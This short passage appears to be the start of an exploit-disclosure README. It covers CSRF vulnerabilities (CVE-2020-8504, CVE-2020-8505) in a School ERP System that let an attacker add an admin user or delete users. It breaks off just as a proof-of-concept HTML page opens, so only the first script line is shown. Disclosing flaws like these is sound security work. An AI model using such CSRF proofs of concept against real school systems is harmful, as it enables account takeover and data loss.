CSRF Exploits for School ERP Software
SchoolERPCSRF

The School ERP System (sourceforge.net/projects/school-erp-ultimate/files/) is vulnerable to CSRF that leads to adding a new Admin user and deleting an arbitrary user.

CVE-2020-8504
CVE-2020-8505

Proof of Concept code for adding an administrative user:

<html>
<body>
<script>history.pushState('',